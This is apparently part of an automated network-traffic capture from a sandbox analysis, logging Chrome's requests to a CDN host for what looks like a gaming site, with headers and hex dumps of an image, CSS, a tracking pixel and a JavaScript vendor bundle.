                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:58 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:58 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17920
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4600"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[2],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE2[448],EU-GER-frankfurt-GLOBAL1-CACHE2[444,TCP_MISS,446],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3b4a7b697feea638f51e82b62eb5dc9c
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814486
                                                                                                                                                          X-CCDN-Expires: 2464135
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:58 UTC15752INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:58 UTC2168INData Raw: 47 0d 80 be c3 75 83 76 e5 8b 35 00 68 53 c0 e6 23 15 ac db 45 f6 9d fb d3 09 fc a1 fe 6b c7 b8 ce 5b 8a e3 32 45 e8 58 38 93 72 2e 3d 90 44 83 ff 00 d3 62 a5 40 76 65 b4 d8 29 e8 3f 87 f6 eb 59 fa 63 2f 3a b0 9c 85 b3 20 34 5b c6 3b e2 4f 75 68 e8 1c c4 29 4e 11 36 40 12 f2 7f 14 6e 90 1d c5 54 65 32 50 f2 1d 8f 49 80 81 83 ec ee ee 7a 15 cc 5f 77 75 ad bf d5 c9 91 6d b6 d3 6d ba 9b df 4b 75 69 53 94 1d e6 65 ce df a2 02 e5 55 a9 19 b3 44 47 99 ff 00 48 94 93 9b c5 e4 a7 84 39 8e ce cb c4 ad a4 9f e0 c7 4b 45 2e 1e be 6d e3 af df 6a 6a 52 af 73 38 2f 70 1d 76 14 b6 f2 72 66 a4 37 b5 f8 91 a4 26 23 88 20 e8 4e df 22 94 47 52 05 47 56 ca cd c2 99 87 19 15 33 d9 7d 89 68 46 d7 51 25 c4 3c e9 23 c5 4b 6c 04 9b fd 95 02 85 14 ab 54 b2 a9 45 c5 ea 28 a3 4a 97
                                                                                                                                                          Data Ascii: Guv5hS#Ek[2EX8r.=Db@ve)?Yc/: 4[;Ouh)N6@nTe2PIz_wummKuiSeUDGH9KE.mjjRs8/pvrf7&# N"GRGV3}hFQ%<#KlTE(J


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          191192.168.2.54993423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC556OUTGET /pc/240516-03/static/css/t4044.css HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:58 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:58 GMT
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 497255
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:31 GMT
                                                                                                                                                          ETag: "6645ca3f-79667"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[6],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,5],EU-FRA-paris-GLOBAL1-CACHE8[8],EU-FRA-paris-GLOBAL1-CACHE10[0,TCP_HIT,7],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473809
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 2dc3b041ad4d449fe786a8efd7c9572e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118191
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:58 UTC15767INData Raw: 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 7b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 30 31 62 31 35 20 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 74 75 74 6f 72 69 61 6c 2f 62 69 67 2d 62 67 2e 6a 70 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 62 6f 74 74 6f 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 7d 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 2c 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 3a 61 66 74 65 72 2c 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 3a 62 65 66 6f 72
                                                                                                                                                          Data Ascii: .tutorial-body[data-v-e9757988]{min-width:1000px;background:#201b15 url(/pc/image-pc/tutorial/big-bg.jpg) no-repeat bottom;background-size:cover}.tutorial-body [data-v-e9757988],.tutorial-body [data-v-e9757988]:after,.tutorial-body [data-v-e9757988]:befor
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 6f 70 2d 64 6f 77 6e 2d 6d 65 6e 75 20 2e 6d 65 6e 75 2d 77 72 61 70 70 65 72 20 2e 67 72 69 64 2d 77 72 61 70 70 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 33 73 7d 23 61 63 2d 2d 77 72 61 70 70 65 72 20 2e 61 63 74 69 76 69 74 79 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 64 72 6f 70 2d 64 6f 77 6e 2d 6d 65 6e 75 20 2e 6d 65 6e 75 2d 77 72 61 70 70 65 72 20 2e 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b
                                                                                                                                                          Data Ascii: op-down-menu .menu-wrapper .grid-wrapper{width:100%;display:-ms-flexbox;display:flex;position:absolute;top:0;left:0;transition:.3s}#ac--wrapper .activity_container .drop-down-menu .menu-wrapper .grid{display:-ms-flexbox;display:flex;-ms-flex-align:center;
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 34 64 65 36 20 2e 37 36 36 36 37 73 20 6c 69 6e 65 61 72 20 31 7d 2e 68 62 73 64 2d 32 34 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 74 6f 70 3a 31 30 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20 31 3b 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20 31 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20 31 7d 2e 68 62 73 64 2d 32 35 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 74 6f 70 3a 31 30 30
                                                                                                                                                          Data Ascii: 4de6 .76667s linear 1}.hbsd-24[data-v-583e4de6]{top:100%;animation:HongbaoRain-data-v-583e4de6 .8s linear 1;-ms-animation:HongbaoRain-data-v-583e4de6 .8s linear 1;-webkit-animation:HongbaoRain-data-v-583e4de6 .8s linear 1}.hbsd-25[data-v-583e4de6]{top:100
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 61 70 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 77 69 64 74 68 3a 31 32 2e 35 25 3b 68 65 69 67 68 74 3a 31 36 2e 36 36 36 36 37 76 68 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 20 2e 68 62 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 38 31 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 20 2e 68 62 2e 73 68 61 6b 65 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 61 6e 69 6d 61 74 69 6f 6e 3a 53 68
                                                                                                                                                          Data Ascii: ap;margin-top:1.5rem}.fixed-hb-wrap .grid[data-v-583e4de6]{width:12.5%;height:16.66667vh;position:relative}.fixed-hb-wrap .grid .hb[data-v-583e4de6]{position:absolute;z-index:8100;cursor:pointer}.fixed-hb-wrap .grid .hb.shake[data-v-583e4de6]{animation:Sh
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 73 67 2d 62 6f 78 2d 6d 61 69 6e 20 2e 6d 73 67 2d 62 6f 78 2d 62 6f 64 79 20 75 6c 20 6c 69 5b 64 61 74 61 2d 76 2d 38 35 35 62 61 65 38 30 5d 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 6d 73 67 2d 62 6f 78 2d 6d 61 69 6e 20 2e 6d 73 67 2d 62 6f 78 2d 62 6f 64 79 20 75 6c 20 6c 69 2e 72 65 64 5b 64 61 74 61 2d 76 2d 38 35 35 62 61 65 38 30 5d 7b 63 6f 6c 6f 72 3a 23 63 30 30 7d 2e 63 6f 6e 76 65 72 73 69 6f 6e 5b 64 61 74 61 2d 76 2d 32 39 39 35 34 62 65 64 5d 7b 6d 69 6e 2d 77 69 64 74 68 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 32 30 30 3b 74 65 78 74 2d 61 6c 69 67 6e
                                                                                                                                                          Data Ascii: sg-box-main .msg-box-body ul li[data-v-855bae80]{line-height:22px;color:#000}.msg-box-main .msg-box-body ul li.red[data-v-855bae80]{color:#c00}.conversion[data-v-29954bed]{min-width:500px;position:fixed;top:0;right:0;bottom:0;left:0;z-index:200;text-align
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 6e 20 2e 69 70 70 77 2d 72 6f 77 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 35 70 78 20 30 7d 2e 69 6d 70 6f 72 74 2d 70 61 73 73 77 6f 72 64 2d 6d 61 69 6e 20 2e 69 70 70 77 2d 72 6f 77 2e 69 70 70 77 2d 65 72 72 6f 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 30 70 78 7d 2e 69 6d 70 6f 72 74 2d 70 61 73 73 77 6f 72 64 2d 6d 61 69 6e 20 2e 69 70 70 77 2d 69 6e 70 75 74 7b 6f 75 74
                                                                                                                                                          Data Ascii: n .ippw-row{display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;padding:5px 0}.import-password-main .ippw-row.ippw-error{padding-top:0;margin-left:90px}.import-password-main .ippw-input{out
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 73 6b 69 74 74 65 72 2d 73 71 75 61 72 65 20 2e 6e 65 78 74 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 35 35 70 78 3b 72 69 67 68 74 3a 31 30 70 78 7d 2e 73 6b 69 74 74 65 72 2d 73 71 75 61 72 65 20 2e 6e 65 78 74 5f 62 75 74 74 6f 6e 2c 2e 73 6b 69 74 74 65 72 2d 73 71 75 61 72 65 20 2e 70 72 65 76 5f 62 75 74 74 6f 6e 7b 77 69 64 74 68 3a 35 35 70 78 3b 68 65 69 67 68 74 3a 35 35 70 78 3b 74 6f 70 3a 31 30 70 78 3b 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 2e 73 6b 69 74 74 65 72 2d 73 71 75 61 72 65 20 2e 70 72 65 76 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 31 30 70 78 3b 72 69 67 68 74 3a
                                                                                                                                                          Data Ascii: skitter-square .next_button{background-position:0 -55px;right:10px}.skitter-square .next_button,.skitter-square .prev_button{width:55px;height:55px;top:10px;left:auto;margin:0;transform:none}.skitter-square .prev_button{background-position:0 -110px;right:
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 70 63 2f 69 6d 61 67 65 2d 70 63 2f 6e 65 77 73 2f 37 36 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 2e 6e 65 77 73 2d 68 65 61 64 65 72 2e 6e 65 77 73 2d 69 63 6f 6e 2d 37 37 5b 64 61 74 61 2d 76 2d 31 63 35 38 62 37 66 36 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 6e 65 77 73 2f 37 37 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 2e 6e 65 77 73 2d 68 65 61 64 65 72 2e 6e 65 77 73 2d 69 63 6f 6e 2d 37 38 5b 64 61 74 61 2d 76 2d 31 63 35 38 62 37 66 36 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 6e 65 77 73 2f 37 38
                                                                                                                                                          Data Ascii: pc/image-pc/news/76.png);background-repeat:no-repeat}.news-header.news-icon-77[data-v-1c58b7f6]{background-image:url(/pc/image-pc/news/77.png);background-repeat:no-repeat}.news-header.news-icon-78[data-v-1c58b7f6]{background-image:url(/pc/image-pc/news/78
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 68 74 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 72 6f 74 61 74 65 4f 75 74 55 70 52 69 67 68 74 7d 40 6b 65 79 66 72 61 6d 65 73 20 68 69 6e 67 65 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 74 6f 70 20 6c 65 66 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 32 30 25 2c 36 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 38 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 74 6f 70 20 6c 65 66 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 34 30 25 2c 38 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 36 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72
                                                                                                                                                          Data Ascii: ht{animation-name:rotateOutUpRight}@keyframes hinge{0%{transform-origin:top left;animation-timing-function:ease-in-out}20%,60%{transform:rotate(80deg);transform-origin:top left;animation-timing-function:ease-in-out}40%,80%{transform:rotate(60deg);transfor
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 64 65 20 2e 73 6c 69 64 65 2d 69 74 65 6d 20 2e 77 72 61 70 20 2e 74 68 69 72 64 2d 6d 65 6e 75 2e 6d 67 5b 64 61 74 61 2d 76 2d 65 33 31 35 62 65 31 63 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 67 61 6d 65 2f 6c 6f 62 62 79 2f 6d 65 6e 75 2f 6d 67 2e 70 6e 67 29 7d 2e 67 61 6d 65 2d 6c 6f 62 62 79 2d 6e 65 77 20 2e 6e 61 76 20 2e 70 72 6f 76 69 64 65 72 2d 73 6c 69 64 65 20 2e 73 6c 69 64 65 2d 69 74 65 6d 20 2e 77 72 61 70 20 2e 74 68 69 72 64 2d 6d 65 6e 75 2e 70 74 5b 64 61 74 61 2d 76 2d 65 33 31 35 62 65 31 63 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 67 61 6d 65 2f 6c 6f 62 62 79 2f 6d 65 6e 75 2f 70 74 2e 70 6e 67 29
                                                                                                                                                          Data Ascii: de .slide-item .wrap .third-menu.mg[data-v-e315be1c]{background-image:url(/pc/image-pc/game/lobby/menu/mg.png)}.game-lobby-new .nav .provider-slide .slide-item .wrap .third-menu.pt[data-v-e315be1c]{background-image:url(/pc/image-pc/game/lobby/menu/pt.png)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          192192.168.2.54993590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC359OUTGET /cc.png?r=8690266696 HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:58 UTC572INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:58 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[21],EU-GER-frankfurt-EDGE5-CACHE4[14,TCP_MISS,20],EU-FRA-paris-GLOBAL1-CACHE24[3],EU-FRA-paris-GLOBAL1-CACHE24[0,TCP_HIT,0],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 36b1a5341d536c2e1a1e542071156459
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:58 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          193192.168.2.54993623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:58 UTC532OUTGET /pc/public/vendor.dll.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:58 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:58 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 316994
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 31 Oct 2018 06:58:57 GMT
                                                                                                                                                          ETag: "5bd952b1-4d642"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[10],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,9],EU-FRA-paris-GLOBAL1-CACHE22[7],EU-FRA-paris-GLOBAL1-CACHE8[0,TCP_HIT,5],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2487305
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: efd5d1a2574b11a5d43cfc87e4e89864
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 104695
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:58 UTC15752INData Raw: 76 61 72 20 76 65 6e 64 6f 72 5f 6c 69 62 72 61 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 72 29 7b 69 66 28 6e 5b 72 5d 29 72 65 74 75 72 6e 20 6e 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 6e 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 65 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 6e 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 2e 6d 3d 74 2c 65 2e 63 3d 6e 2c 65 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 65 2e 6f 28 74 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6e 2c 7b 63 6f 6e 66 69
                                                                                                                                                          Data Ascii: var vendor_library=function(t){function e(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,e),i.l=!0,i.exports}var n={};return e.m=t,e.c=n,e.d=function(t,n,r){e.o(t,n)||Object.defineProperty(t,n,{confi
